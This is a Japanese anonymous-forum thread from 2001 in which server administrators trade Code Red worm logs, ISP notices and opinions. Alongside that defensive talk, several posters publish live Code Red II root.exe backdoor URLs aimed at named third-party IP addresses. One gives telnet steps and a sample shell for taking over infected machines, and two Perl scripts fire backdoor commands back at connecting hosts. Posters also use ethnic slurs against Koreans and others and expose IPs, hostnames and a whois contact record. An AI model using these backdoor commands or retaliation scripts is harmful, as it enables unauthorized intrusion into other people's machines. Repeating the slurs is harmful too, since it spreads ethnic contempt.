ゴキブリ並だ

ねー、うちにもco.jpやac.jpやgo.jp誘致して偉そうにクレームたれたいんだけど、どうすれば来るの？
さっきからADSLの厨房サーバーからしか来なくて飽きてきた。

>>198
禿げしく同意。一番面白い時期に怖くてルータのポート閉じていた。
いま、激しく後悔。

某国営放送から取材したいって来た。Ｂｙメール

プロバイダーのアドミンは盆休み消滅ですか？

>>200
おめでとう御座います

>>200
怪しいハッカーに仕立て上げられないように気をつけてください（藁

>>200
朝鮮国民放送ですか？

赤い暗号では無いと逝っといて。

>>200
うらやましい。

「当社のサーバーのアパッシュダンス丸木を調べたところ〜」

ぐらいの発言はしてほしいね

30分の間に韓国から20件アタックされてる。。。うぜぇ

三大病原体
韓国台湾香港

>>200
数日後にニュースでコメント読まれたりするかもな

>>207は無理でも、「ログ」は全部「丸木」で通すぐらいはしてくれんだろうね？

>>207 ﾜﾗﾀ ﾜﾗﾀついでに落ちる。良いウィークエンドを。

>>200
これで一流のﾊｶｰだね･･･ﾊｧﾊｧ･･･

さっき連続攻撃されたアドレスに根.うぜえを投げたら
「実行しますか？、保存しますか？」って言ってきた。
怖くてキャンセルしたけどなんでだ？

アパッシェダンス丸木ってアパッチのログのことですか？

1-octets目が、"4"のお国ってどこ？
アタックされてる（ﾜﾗ

>>207
ちょっと鬱だけど後ろのＰＣに
http://www.nefty.net/desktop/haritsuke/img-box/img20010810131012.gif
これでもだしておいてと
「これがアパッシュダンスで・・・・
こんな感じ？

>>215
英語に弱いエンジニアにとっては見慣れた単語です。
丸太

目線、曇りガラス、音声変更でお願いしますって言え

>>219
これは基本だな

代わりに実行ファイルを送られたと思われ
罠じゃないか?確信犯だな

ちなみにこれ
>>221
210.94.178.29
（人にやらせようとするやつ）

てことで、ipさらせ。

>>220
さらに、「今までに、これで2000万以上は儲けましたね」とか言え

インターネットは庭みたいなもんですね、とか言ってくれ

リアルタイムで体を液体金属にしてもらう

「僕を捕まえる？ハハ、不可能ですよ」ぐらい軽く言え

え〜んに言わせたいこと書くスレになったんかよ・・・

>>224
「え〜え〜もちろん儲けましたよ。大きな声じゃいえませんが。
まだ行けますね、だって某巨大掲示板を除いてだれも気づいてないもの。」
こんな感じか。

>>229
乗り気だな

庭には二羽にわとりがいるとも言ってくれ。

犯人のの幼少の頃の話を聞かせてほしい。

いたずらはいやずら、も忘れちゃいかんぞ

>>227
「僕はネットのアルセーヌ･ルパンですからね」も追加だ

＊＊＊＊＊＊＊ここまで＊＊＊＊＊＊

もう眠い。

みんな、先寝るおやすみ。
へたれのせいで明日も明後日も仕事。

取材か。いいな。これでひろゆきに追いつけるね。

明日の朝ちゃんとチェックするから

もう寝るのか、ルパン失格だぞ

わしも寝るわ。明日は原稿だ。
★★★ここまで読んだ★★★

え〜え〜もちろん儲けましたよ。大きな声じゃいえませんが。
まだ行けますね、だって某巨大掲示板を除いてだれも気づいてないもの
えっ僕を捕まえる？ハハ、不可能ですよ僕はネットのアルセーヌ･ルパンですからね

こんな感じ？

すくなくても、
姦国逝ってよし！！！
くらいはお願い。

じゃあさ、ひろゆきの
「うそをうそと見抜けない人は使うのが難しいですね」
を超える名言を考えようぜ。

>>240
うむ、視聴者もまさか管理者とは思うまい。ドッキリってやつだ

>>240
さいてーのサイバーパンクって感じだな(藁

>>240
アナウンサーの反応は
うーんこれから早急にインターネットの
セキュリティ強化が求められますね
って感じのお決まりってやつになりそうだな

で、服のそでにはカピカピに乾いたご飯つぶを付けといてくれ

みんなえ〜んに期待してるな。放送が楽しみ

上の鯖から根.ほにゃら 拾って見たんだけど
これどうも本物の CMD.exe だなぁ。
ひょっとしてこれがタイプIIIの発症例か？

「主食はカップ麺です。」

それって実行権はずしてあるんじゃない？

wget で取って来たから・・わからん
ちなみにでび丸だうちは

>>248
ApacheでいうExecCGIを外したんだな。
中途半端だな

なんとか工夫して

　　 ∧＿∧
　　（　´∀｀）
　　（　　　　）
　　｜ ｜　|
　　（_＿）＿）

を発音してくれ。

>>250
結果的に、いちおう、バックドア対策？？

オマエモナー

gt;ってなんだ？

&を忘れたんだろ。もしくはスクリプト側で消されたんだろ。
面倒だから試さないけど

と思ったら、聞いてるのは本人かい

>>254
　さあ？

>>257
他の板でも疑問が出てるけど、トリップができてから
この現象が起きてるような気がする。

トリップはコピペ防止用に◆を◇に変えるスクリプト
組んでるようだからその弊害かも（よくわからない）。

いつまで続くの？

地上からIISが消えるまでだろうな

jsat-sv1.jsat.ne.jp
ここJmc Security Agent Teamって言うらしいが数日前からずーっと
Code Red来てる。
知ってて放っているのか？

>>261

今回のCodeRedは無くなってもきっと第二、第三のワームが・・・・。

MP3発見

http://210.113.73.103/scripts/root.exe?/c+dir+"d:\MP3"

>>264
BGMは
http://www.infosnow.ne.jp/~napoleon/mid-mp3/march_of_Ifukube_medley.mid
で、最後に
http://www.infosnow.ne.jp/~napoleon/mid-mp3/godzilla-voi.mp3
かな。

>>265
　そういうのはWinMxでやりなよ。

記念カキコ（うふ

http://www.security.nl/misc/codered-stats/
更新age。左にニュースヘッドラインが付加。
http://www.security.nl/misc/codered-stats/geodist.gif
赤丸がだんだん拡大してきているように思えます。

googleで翻訳すると
http://translate.google.com/translate?hl=ja&sl=en&u=http://www.security.nl/misc/codered-stats/
赤みみず・・。

>>266

よかった。もしかしたら誰もわかってくれないかと思ってたよ。

>>269
赤みみず、ﾜﾗﾀ　worm=ミミズ　なんだ。

赤丸の部分がミミズに覆われてると想像すると…
やめてくれー！　気味悪いよ！！

そういえば、巨大なミミズが出てくる映画があったような記憶が…

みんなおはよ

>>271
巨大ミミズじゃないけど、うじゃうじゃと出てくるミミズに人が食われる
スウォームという映画があった。部屋一杯にあふれたミミズに食べられちゃうやつ。

「コード・レッド　II」の感染拡大が加速
北京冠群金辰コンピューターウイルス対策センターによると、北京、浙江、広州、江蘇、四川など
20の省（直轄市）では8日までに、ワーム型コンピューターウイルス、コード・レッドの新種「コード・レッドII」
の感染が確認され、政府機関のネットワークを含むインターネットサーバーの多くが麻痺状態に陥った。
国内の一部のウェブサイトでは、電子メールの送受信件数が明らかに減っているほか、受信に24時間
以上かかる例も報告された。
中国教育科学研究網の呉建平氏は「コード･レッド　II」について、「すでにCIHによる被害を超え、
中国のネットワーク史上最大の損害が生じている」と述べた。
ウイルス対策の専門家は、今後数日内に国内のネットワークシステムでのさらなる感染拡大が懸念さ
れるため、マイクロソフトのパッチをインストールしてネットワーク抜け穴をふさぐなどの措置をとるよう
呼びかけている。
そのほか企業内イントラネットでもセキュリティシステムを改善し、感染を未然に防ぐ努力をする必要が
ある。

｢人民網日本語版｣2001年8月10日

http://j.people.ne.jp/2001/08/10/jp20010810_8272.html

これマジ？

http://channel.goo.ne.jp/news/reuters/kokusai/20010810/47819-1.html

ここ二日ばかりかなりアタックが減ってきたんだけど
もしかして沈静化しつつある?

まだかな？
それとも、もうきてるのかな
楽しみだな（waku-waku

ところで…
しみじみ述べていいですか…

夕べ、おとついと、カキコできなかったのに、「しみじみクンは…」というレスが何件
か見受けられましたのでうれしかったです…おとついは眠くて、夕べはフィリピンパブ
に逝って午前様だったので、ここを覗いてませんでした…

ＭＳはパッチを出しなおしたらしいですが、ますますパッチの当て方が煩雑になるよう
で不安です。実は私、自宅鯖にＮＴ＋ＩＩＳのものが１台ありまして、（当然パッチあ
ててますが）また当てなおさなきゃいけないんか？と面倒に思ってます。新種がでてる、
とか、パッチが正しく機能しない、とかの情報もあるようですし…

ＭＳやZDNet、gooなんかのニュースページは、（不確定情報も多いが参考になるページ
）として、ここのスレ、リンクすればいいのに…

「Code Red III」は誤認の可能性
http://www.zdnet.co.jp/news/0108/11/b_0810_05.html

>>275
誤報の可能性あり との情報。http://www.zdnet.co.jp/news/0108/11/b_0810_05.html
報告したのが、アノ国ですからなぁ

それにしても相変わらず韓国から80番ポートを見に来てる。
うざい。

素人の提案ですが、この板はスキルの高い方が見えられるようなので．．．
発想そのものは、ここでも既出ですが code red のプローブに進入機能
を付けて警告と対応策URLを記述した画像をデスクトップに表示させる
ようにしたらいかがでしょうか。もちろん、このプローブそのものが法律
違反ですから、これは既に裏口を空けられた、放置されたようなサーバー
にネットカフェ等から設置すると言うアイデアです。素人の馬鹿な思いつき
ですが御検討願います。

>>282
スキルもモラルも人並みにあるので、できるけどやらない人が過半数と見られ。
以下、進行元に戻る。

なぜ韓国はこんなに被害が出てるんですか？

>>279 >>280
何と言っても閑国だからなぁ（ｗ
事実誤認と勘違いが得意な迷惑な国ってことでいいですか？

にしても、閑国からは一向に減らない。今更って感じだけど馬鹿ばっかりか？

dion からも減らない :(

なんなんだ、あそこは。

>285
グローバルアドレスでの接続数（ダイアルアップでも感染するから回線は考慮せず）はもっと多い国は幾らでも有るのに感染数が圧倒的に多いというのはセキュリティー、それも他のサイトに対して迷惑をかけないという観点でのものが著しく低いということの証明ではないでしょうか？
特にブロードバンド接続（って常時接続だよね？）の普及率が高いというのを自慢しているのにこれでは情けないですね。

ところで、韓国で感染しているIISサーバーの数と、MSが韓国に出荷しているNT,2000の総数のどちらが多いんでしょう？

韓国人には保守という概念がありません。

われず天国だって、某板で当該国のまともな人が愚痴ってましたよ。

なんつーかアレなＷ２Ｋとかが多い −＞ パッチ取りに行きたいけど行けない
（行くとＭ＄に情報抜かれてバレるから） −＞ あーんどうしよ〜うママン
・・ってパターンとか。

http://www.bk1.co.jp/cgi-bin/srch/srch_detail.cgi/3b749d4d2837e0105a6e?aid=01nikkeibp0002&bibid=02054238&volno=0000

この勘違い野郎に何かいってやれよ。

ただいま

>>292　ｵｶｴﾘ

昨日あたりから「新しい亜種が出た」との噂が多いのでバイナリ部分も
記録するスクリプトを置いてみた。

#!/usr/local/bin/perl
($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) = localtime(time);
$date_now = sprintf("%02d/%02d/%02d-%02d:%02d:%02d",$year-100,$mon +1,$mday,$hour,$min,$sec);
read(STDIN,$buffer,$ENV{'CONTENT_LENGTH'});
open(WRITE,">> CodeRed.log");
print WRITE "*****$date_now from $ENV{'REMOTE_ADDR'}\n$buffer\n";
close(WRITE);
print "Content-type: text/html\n\ndummy";
exit;

10匹くらい記録したけど新種は見当たらないなあ。

今、某国営放送にお返事メールだしておいたよ。

>>code red 3
一番最初に出たcode redのバックドア無しの亜種がcode red2だとすると、
結局はここで言うcode red2がcode red3なのでは？

ぱったり来なくなった。

本日のログ。朝９時〜現在
すべてcode red2也

2001/08/11(09:02:10) 61.136.189.106
2001/08/11(09:08:22) 61.132.17.2
2001/08/11(09:17:45) 61.13.55.29
2001/08/11(09:24:03) 61.72.47.200
2001/08/11(09:38:35) 61.183.122.18
2001/08/11(09:50:43) 61.175.211.186
2001/08/11(09:56:50) 61.73.244.206
2001/08/11(10:05:26) 61.74.202.146
2001/08/11(10:06:26) 61.115.198.250
2001/08/11(10:09:48) 61.115.198.250
2001/08/11(10:15:11) 61.203.103.85
2001/08/11(10:17:57) 61.175.167.200
2001/08/11(10:35:18) 61.251.254.96
2001/08/11(10:36:16) 61.72.47.113
2001/08/11(10:40:31) 61.33.48.135
2001/08/11(10:48:13) 61.183.122.18
2001/08/11(10:57:12) 61.115.198.250
2001/08/11(11:01:40) 202.52.72.10
2001/08/11(11:02:31) 61.38.91.148
2001/08/11(11:30:52) 61.142.98.149
2001/08/11(11:32:02) 61.36.21.73
2001/08/11(11:35:06) 61.115.198.250
2001/08/11(12:35:22) 61.144.175.182
2001/08/11(12:36:42) 61.115.220.66
2001/08/11(12:40:43) 61.115.220.66

>>298
http://202.52.72.10/
おお。この書き換えページ。。。マトモにみたのは初めて。。。
＃日本語版とかＫ国版ばっかりだったから

私のところへの CodeRed ...

8/11 0:00:00 〜 13:08:05 まで

TypeI : 4 回
TypeII : 86 回

Domain 判定した奴ら晒上げ

15.4.252.64.snet.net
61-216-68-76.HINET-IP.hinet.net
61-218-90-190.HINET-IP.hinet.net
61-219-132-250.HINET-IP.hinet.net
61-219-169-137.HINET-IP.hinet.net
61-219-175-140.HINET-IP.hinet.net
61-219-212-221.HINET-IP.hinet.net
61-220-70-226.HINET-IP.hinet.net
61-221-228-129.HINET-IP.hinet.net
61-224-9-79.HINET-IP.hinet.net
G003174.ppp.dion.ne.jp
M037167.ppp.dion.ne.jp
N041014.ppp.dion.ne.jp
N053176.ppp.dion.ne.jp
N056015.ppp.dion.ne.jp
N081028.ppp.dion.ne.jp
N081119.ppp.dion.ne.jp
N089147.ppp.dion.ne.jp
adsl-65-42-158-81.chicago.il.ameritech.net
c150.h061016031.is.net.tw
c244.h061013029.is.net.tw
host43-34.prestige.net
ip101.bynxx3.adsl.tele.dk
kwsk055n131.ppp.infoweb.ne.jp
otfi252-246.biwa.ne.jp
p0353-ip01yosida.nagano.ocn.ne.jp
p1233-ipad01hodogaya.kanagawa.ocn.ne.jp
p78b654.chibnt01.ap.so-net.ne.jp
xdsl227019.061202.metallic.ne.jp

なんとかせんか、ゴルァ！

>> 300

判定 ?

判明 :)

>>269
> http://www.security.nl/misc/codered-stats/geodist.gif
> 赤丸がだんだん拡大してきているように思えます。

遅レスで申し訳ないが、上記は「Data from Aug 1 to Aug 5」と
あるので、8月6日以降は変更されていないと思われ。
主にオリジナルの Code Red による感染状況と思われ。

Code Red II の感染分布はこれ。
http://www.security.nl/misc/codered-stats/geodist-rcv2.gif

>>301
resolveって意味だろう。

>>302
現在時刻でサマリしたら赤の四角GIFが表示されることになる
からな。（冗談）

http://61.126.135.234/scripts/root.exe?/c+dir+"d:\rom"
エミュ発見！！

>>305
報告しなくていいよ。

>>305
そんなヤツにはお仕置きだ。
http://61.126.135.234/scripts/root.exe?/c+dir+"c:\"

>>305
61.だったから漏れのかと思った。ﾋﾞｯｸﾘｼﾀﾅｱﾓｳ

305.307をクリックすると
どうなるんですか？

マジレス希望します

>>309
うまくいけば逮捕されます。

そのIPの人のパソコンの中を見れるということですか？

ネジを外さないと中は見れません

>>311
　そのパソコンにはあなたのIPアドレスやらなんやらが
　ログに記録されます。

>> 311

CodeRedII に感染した Windows には、バックドアが仕込まれます。

このバックドアを使うと、中を見るだけでなく、乗っとる事も出来るのです。

たとえば、

C:>telnet ab.cd.ef.gh 80

のように接続して、次の一行を入れて改行すると、

GET /scripts/root.exe HTTP/1.0

中に入れてしまいます。

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 10 Aug 2001 20:36:28 GMT
Content-Type: application/octet-stream
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.

c:\inetpub\scripts>

あとは、このマシンで好き放題。

ログ抽出用スクリプトつくってみた。
access_logを [cd /][find -name access_log -print]
とかして探して、そこに入れて実行してみて。使わないかもしれないけど。
#!/usr/local/bin/perl
foreach $view (`grep "XXXXXXXX" access_log`){
$view=~/([a-z0-9\-\.]+)/;print "$1\n";}

>>313
そのマシンだけでなく、中継したルータにもログが残ります

>>311
こらこら。マジレスすんな。

>>244
遅レスすまん。
誉めてくれてサンクス　　ニヤリ

沢山のご説明ありがとうございました。

では、以下のサイトのような串を使って進入しても
ログが残りますか（私だと特定でしますか？）。
http://www8.big.or.jp/~000/CyberSyndrome/link.html

出来ます。あたりまえじゃないですか。

っていうか、警察がログ出せやゴルァ！って言えばログださんとあかんでしょ。

>>319
Proxyサーバに管理者がログを請求して入手できれば特定される。

それに、telnetって串とーせんの？（俺よーわからん）

じゃあクリックしないほうが良いってことですね

お世話様でした。

あ、port80にtelnetか

>>324
ねっとかふぇいってらっさい

バックドアから侵入したきた奴のIPを晒すスレとかあったら
有意義かもしれないなあ。

>>319
進入→即フォマト→標的「またハングかゴラァァ・・ガチャガチャ」→標的しばし呆然（？？）→１時間後プロバの電話番号やっと見つける→「ログよこせゴラァァ→プロバいまそれどころじゃないんじゃい！→ログ流れ
こんな感じ？

ネットカフェというてがあったんですね。

チャットでカフェからやってる人に頼んでみます

>>299

tableタグ閉じわすれだよ。NNで見えないよ。くそ、ワームまでIE用か

フォーマットはアドミニストレーター権限ないと出来ないと
思われ。ログファイルもプロセスがロックしてるから消えないと
思われ。

>>330
あ、俺もNNでみれんかった。
きっと意図的なんだろーな。。。

>>299をクリックしたらバックドアに感染したんですけど・・・

>>329
　よしなさいって。どうしても覗き欲求を満足させたいなら、
http://www.inpaku.ntt-west.co.jp/mutsu/tayori/live/index.html
　から、可愛い小犬の様子でも覗きなさい。

IIS と同じ権限が取れるよ。
アドミンで動かしてたら、アドミンになれる。

普通アドミンじゃないの？

>>328
進入→即フォマト→標的メーカーサポートへ「パソコンが壊れた。早く直さんかいゴラァァ」
以上繰り返し。
こっちの方が多そう。

>>335
確かに、普通の人はインストールと遊びを分けてない。

もぢらは見れたが

>>336
そうだな、そういえば。
漏れ、メーカーに電話したことないからな。

>> 331 335

このバグ↓ついているんだから、アドミンになれる。
http://www.zdnet.co.jp/news/0106/19/e_iisflaw.html

セキュリティパッチあてないドキュソ管理者だもん。
全部デフォルト、デフォルト。

>>299をクリックしたらバックドアがどうとかって
ノートンが反応したんですけど
どういうことですか？

なんか大変なことになっています

その前に、稼働中のシステムの入ったパーティションってフォーマット出来るの？
はじかれそうだけど。

80にConnectしてきたら
GORAa!GORAa!GORAa!GORAa!........GORAa!GORAa!GORAa!GORAa!
ってSendしてもいいですか？

>>341
壁越しにクリックしてる？せめて８０、１３７〜１３９、４４３はふさいでね。

>>342
やっぱ自分ので実験してみるか。

自動報復装置(ARS)内蔵かもね。古い...

>>342
formatじゃなくてfdisk（NTにある？）でパーティーション解除とか。

wipe.com・・・

>>341
うちは特になんともないけど。NISも何も警告だしてないし、
ログも普通。

とろいが動く条件には MS00-052 も関係なかったっけか？
それもリブトの後にアドミンがろぐいん？

結局赤虫とは関係無いパソコンメーカーサポートにも赤虫被害は進行していくのでした。

/scripts/root.exe?/c+echo+Content-Type:+text/plain&&echo.&&type+\winnt\system32\logfiles\w3svc1\ex010811.log

>>352
またそうやって晒す
普通の人はログの置き場所知らないんだから。

>>346
はやく停めにゆかなきゃ。
ネーレイドはまだ稼動状態にあるかな？

気持ち悪いからOSフォーマットしてきました。
確かにバックドアが入ってきましたよ
警告がバンバン来ましたし>>349

>>345
実験結果　やっぱやばいっす、しゃれになりまへん。

#! /usr/bin/perl
$postmes = '/scripts/root.exe?/c+dir+"c:\"';
$useragent = 'anti akamusi 072';
use Socket;$sockaddr = 'S n a4 x8';
($na,$al,$prt) = getprotobyname('tcp');
($na,$al,$type,$len,$hostaddr)=gethostbyname($target);
$iis=pack($sockaddr,2,80,$hostaddr);
socket(IIS,AF_INET,SOCK_STREAM,$prt);
connect(IIS,$sock);select(IIS);$|=1 ;
print IIS "\r\n";
if(!$u){print IIS 'GET default.ida?HAYAKUTAIOUSIROBAKA.FUCKIN.IIS.ADMIN HTTP/1.1\r\n";}
else{print IIS "GET $postmes HTTP/1.1\r\n";}
print IIS "User-Agent: $useragent\r\n";
print IIS "Accept: */*\r\n";
close(HTTP);exit;

#! /usr/bin/perl
$postmes = '/scripts/root.exe?/c+dir+"c:\"';
$useragent = 'anti akamusi 072';
$target = $ENV{'REMOTE_ADDR'};
use Socket;$sockaddr = 'S n a4 x8';
open(RED,">>codered.txt");
($na,$al,$prt) = getprotobyname('tcp');
($na,$al,$type,$len,$hostaddr)=gethostbyname($target);
$iis=pack($sockaddr,2,80,$hostaddr);
socket(IIS,AF_INET,SOCK_STREAM,$prt);
connect(IIS,$sock);select(IIS);$|=1 ;
print IIS "\r\n";
if(!$u){ print IIS 'GET default.ida?HAYAKUTAIOUSIROBAKA.FUCKIN.IIS.ADMIN HTTP/1.1\r\n";}
else{print IIS "GET $postmes HTTP/1.1\r\n";while(<IIS>{print RED;}}
print IIS "User-Agent: $useragent\r\n";
print IIS "Accept: */*\r\n";
close(HTTP);exit;

>>299のってCode Redだったのか・・・
俺の所は7月9日に61.24.3.135からport53を叩かれて、httpで開いてみたらまさにコレだったんだよ
その頃のport80叩きって、まだ3日に1回有るか無いかなんだけど、もう出回ってたってことなんだな

sadmindって可能性もあるんじゃないかな。

>>355

たしかにブラウザのキャッシュをNAVでスキャンすると
sadmindが検出されますね。でも引っかかったファイル
ただのhtmlにしか見えないんだけど。

http://210.64.246.2
これもsidmindか？

Web改ざんの手口
http://www.geocities.co.jp/SiliconValley-PaloAlto/4331/webjack.html

>>355
http://www.sarc.com/avcenter/venc/data/backdoor.sadmind.html
↑ここに情報が。
要するに、NAVが「Backdoor.Sadmind.Dr」を検出したと報告するの
は、あなたが感染したのではなく、感染したwebsiteにアクセスし
たという意味である由。

>>362
　やられたのが自分のサイトなら
　ファイルが書き換えられている->sadmind
　ファイルは書き換えられてないけどアクセスすると
　内容が書き換えられている->code red
って事なんだろうね。

相手に注意のディレクトリ作ってやったんだが、
やっぱログファイルけしたほうがいいかな？

やっぱ消しちゃあかんな。やめとこ。

多分消せないと思われ。
つーか、やるなよ。

相手がPPPの場合、時間が経ってると別人の可能性もある。

別人にしても、あの手法でアクセスできるのなら、
同じだと思われ。

そういや、そうだね。

そして、不法アクセス失敗のログが残ると。

>>371
　別人なら。

感染しているようなサーバーって、ことごとくNETBIOSも通ってるな・・・
信じられねー。

ログから逮捕だって。

NETBIOS通るなら直接Net Sendも出来る？

日本でいうと、旧郵政省みたいな所から、、。
日本だと、ニュースになっちゃうね。

person: Xu Yongzhong
address: Data Communication Bireau
address: Ministry of Posts and Telecommunications
address: A12 Xin-jie-kou-wai Street
address: Beijing 100088
country: CN
phone: +86-10-62053991
fax-no: +86-10-62053995
e-mail: [email protected]
nic-hdl: XY1-AP
mnt-by: MAINT-NULL
changed: [email protected] 19960319
source: APNIC

バックドア使わないでNet Sendで警告送れれば一番良いと思うんだけどなあ。

現在攻撃続行中でメモリ中にCodeRedIIが生きている状態のIISって
HTTPログが残らないんじゃネーノ？

残るって説と残らないって説があるらしいね。
http://www.reasoning.org/jp/security_alerts/hashsa-2001-02.html#packet

NTならバックドアが作成されないし、
2000 Server/Proだと故意感染させたPC(内->外のTCP80を抑止)
にはやはりHTTPログは残存しないな。
感染直後でとまってる。

>>294
50匹ほどバイナリを比較しましたが新亜種は無かったよ。
全部ノーマルXXXだったよ。

>>380
それは良い事を聞いた(藁

一度でもリセットされると再感染まではログは
残る。まあ今の状態なら、5分もつないでればダイアル
アップだろうがPHSだろうがヤラれてしまうので
こっちのログに残ったXXXXのアドレスにちょっかい
出してる分にはｺﾞﾆｮｺﾞﾆｮ...。
日本国内のはやめといたほうがｺﾞﾆｮｺﾞﾆｮ...。

>>294
すみません。設置方法を教えてくださいませんか？
当方WinNT４svr　ApacheとPerlは入ってます。

アルファネット痛すぎ（w
よっぽど苦情がきてると思われ（w

アルファインターネット会員様各位
　　　　　　　　　　　　　　　　　　　　　　　　　　平成１３年８月１０日
=======================================================
新種ウイルス「CODERED」（コードレッド）及び亜種ウイルスの
感染チェック・駆除の再徹底について
=======================================================
日頃はアルファインターネットをご利用頂き有難う御座います。
８月８日に新種ウイルス「CODERED」（コードレッド）の警告と
感染チェック、駆除についてメールさせて頂きました。
残念ながら、「感染会員からのアタック被害」告知が減少しておりません。
今回の被害により、「警察への被害届」を提出されたケースが複数件発生しております。
他人事ではなく、ご自身が加害者である可能性がある事を
再認識して頂き、早急な「感染チェック、駆除」の再徹底をお願い致します。
特に法人様が感染し、アタックを知らない間にかけていた場合、
法人の信用問題にも発展しかねませんので、対応が必要です。

前回のメール同様、もし感染が確認された場合は
「完全駆除が終了・安全確認」されるまで「ネットワークへの接続は停止」
させて頂きますので予めご了承下さい。

やっと仕事終わった

>>382
2000proはローカルセキュリティポリシーでログオンイベントを有効にしないと
残らないと思ったが。

駄レスですまん。
全部読んでなかった。

So-net内から、打ち込まれてるよー。
ディレクトリ丸みえだよー。
今度きたら、ここでIP晒したろ。

>>384
説明する程たいそうな物じゃないよ。スクリプトをDocumentRootにdefault.idaって名前で置いて
#!/usr/local/bin/perl
1行目のこれ↑を適当に書き換え。.htaccessに次の1行追加
AddType application/x-httpd-cgi .ida
空ファイルCodeRed.logを書きこみ可で作成。

>>385
つーかさー、客にお願いする前にISPがフィルタするべき話
なんじゃネーノ？と思ってしまうが。
*.krからのアクセスをdeny設定してくれりゃそれでいいよ。

>>385
>法人の信用問題にも発展しかねませんので、対応が必要です。
この辺が痛いね。相当絞られたんだろう。

>>391
ユーザの中には在日も居ると思われ。

>>393
国家賠償責任つーことで。奴らそういうの得意じゃん。

>>391
>前回のメール同様、もし感染が確認された場合は
>「完全駆除が終了・安全確認」されるまで「ネットワークへの接続は停止」
>させて頂きますので予めご了承下さい。
アルファだから叩きたいんだろうけど、プロバイダーとしては
結構踏み込んだ内容で、僕は評価する。

「だれでも簡単接続〜」
なんていって素人客集めて、ヤレこんな事態になったら
急に客にセキュリティ保持義務を押し付けるのもどうか、
ってことよ。
アルファだから、ってのは全然意識してない。
オレんとこのISPはフィルタどころか通知さえこない。
隣人からのアタックも途絶える気配なしだ。

そー言えばおれんとこ朝日ネットだが何の注意喚起もないなぁ。

>>396
WinMeとか使うしか。よんど気に入らなきゃHDDフォーマットした上でISP換えれば吉。

これってperlにならない？

http://slashdot.jp/comments.pl?sid=01/08/05/0441253&op=&threshold=0&commentsort=0&mode=thread&startat=&pid=105#126

>>398
いや別にオレのPCには被害はないんだが。

実効効率としちゃISPのルータにACLぶちこむのが
一番妥当で事態収拾の近道だと思うよ。

So-net内からの赤虫アタックって
これまで、無かったんだけどなー。

FWIN,2001/08/11,19:42:49 +9:00 GMT,210.132.232.126:3372,210.139.218.XXX:80,TCP (flags:S)
FWIN,2001/08/11,19:59:16 +9:00 GMT,210.117.85.149:3456,210.139.218.XXX:80,TCP (flags:S)
FWIN,2001/08/11,19:59:18 +9:00 GMT,210.101.100.106:1263,210.139.218.XXX:80,TCP (flags:S)
FWIN,2001/08/11,20:01:21 +9:00 GMT,210.139.99.187:3722,210.139.218.XXX:80,TCP (flags:S)

>>396
約款にちゃんと自己責任て書いてあるべよ。と議論しても始まらないが。
アクセス制限の件、感染者のみ接続制限してるのなら、ヨイと思う。
他のお客さんにも迷惑がかかるし、客同士で注意するのが大変だから店員が
注意するのがフツーであり、注意も聞き入れない客は退場。by飲み屋の法則。

そこ、異常に遅くて読めないのは何故だろう。
多分CでNet Sendしてあげる奴だと思うけど、あて先はマシン名じゃないと
いけないからlocalhostじゃ届かない場合があると思う。

>>401
そうかもしれんが、実際は難しいと思う｡
それをやってしまうと、もう二度と外せない。
一番効果的なインターネットエクスチェンジで、
観測も対処も出来たんだろうが。してしまうとねぇ。

>>399
たぶん>>358に手を加えればそっくり出来るよ。

>>403
感染者の接続制限はいいんでないの？きめ細かい対応だと思うよ。
飲み屋の例えでいうと、もはや飲み屋で大火事なわけさ。
ルータのdeny設定がそんなに手間のかかることとは思えないし
外部からガンガンにアタックパケットが流入している状態を
ISPのADMINは一体どう考えて放置してんのか、ってこと。

＞それをやってしまうと、もう二度と外せない。
はあ？ネットワーク系の仕事は長いけれど
そんな話は初耳だが。収まるまでの時限措置でいいだろ。

>>408
なんで収まるんだよ。フィルタリングで感染しなかったということは、
感染対象ホストがまだいっぱいある状態ってことだろ。

>>395

>アルファだから叩きたいんだろうけど、プロバイダーとしては
>結構踏み込んだ内容で、僕は評価する。

激しく同意
安いかろう悪かろうみたいによく言われてるけど
ちょっとした質問とかで電話しても話がはやいとこが好きなんだ。
D○ONなんかまるっきり話が通じねーもん
D○ONのねーちゃん　pop before smtp　くらい知ってろよ、ってかんぢ（藁

>>409
確かにそうかもね。ただ、感染してるのを取り除いてやるのはISPの責任ではない。
あと、CodeRed I/IIに限れば期間限定Wormなので期限付き対策が有効。

>>409
あんた今回の状況わかっていってる？
ダイアルアップでWin2KPro使ってる素人ユーザは、
自分が感染していることすら気づいてないんだぜ。
感染対象ホストが大量にあるのはその通りで、
フィルタ掛けてそいつらが毎晩再感染して他を攻撃して
しまうのを防止するほうが重要だろう。
「外部」からの攻撃が収まるまではACL設定しろって
いってんだよ。

>>411
亜種が出なければな。

>>412
またーりしろよ。

>>412
だから、俺が言ってるのは、感染してるユーザのアカウントを停止
すべきだって言ってるんだよ。
これだって、不必要に人に迷惑かけているんだけど。
それ以上誰かに頼るなよ。

>>413
感染してる人は、無期限に塞ぐか、接続断。これ自業自得、ということで（藁。
>>414
まったく尿意。

ウチにアタックしてきたIPをのぞいてみたら
TOPに
fuck china government fuck poizonbox
って出たが、これはなに？
なんかやばかった？

>>412
外部からの攻撃が終わったら、今度は内部から攻撃することに
なるだろうボケ！！

>>406
すぐできるものなのかな？
俺にはできないから誰か書いてくれないかなー

>俺が言ってるのは、感染してるユーザのアカウントを停止
>すべきだって言ってるんだよ。

412だけどこれには反対してないよ。
ただそれだけのもぐらたたきじゃいつまでたっても
混乱は止まらん。

>>418
またーりしろ(ﾟдﾟ)ｺﾞﾙｱ

>>418
なるほどそれでかみ合っていないと思われ。警告メールを送って、メールしか読み書きできないように
塞いでしまえばよいのである。
ていうか、なんでけんか腰になるのか理解できない・・・

>外部からの攻撃が終わったら、今度は内部から攻撃することに
>なるだろうボケ！！
マターリしろよ。（笑
*.krの抑止だけで数が圧倒的に減るちゅーに。
自分のW2Kで試してみな。

>>397
おれの仕事仲間がWin2K使ってるんだけど
朝日から昨日通知きたって言ってたよ。
もちろん彼は感染者だったんだけど(w
で、おれに相談してきたからここの事をメールしておいた。

ていうかむしろ、やっぱりどうにかしてくれ *.kr のほうが深刻だろう。
CodeRed I/IIでもそうだが、今後もやっぱり信用できないと思われ。

減ってきました。
皆さんはどうですか？

全然減ってない。

>>424
対象毎にメールしてるのね。
感染してなくてよかった。

>>426
お盆休みで日本人がPCの電源入れてないだけかも？

>>428
うん。誰か朝日にﾁｸｯたらしい。
本人落ち込んでた(w

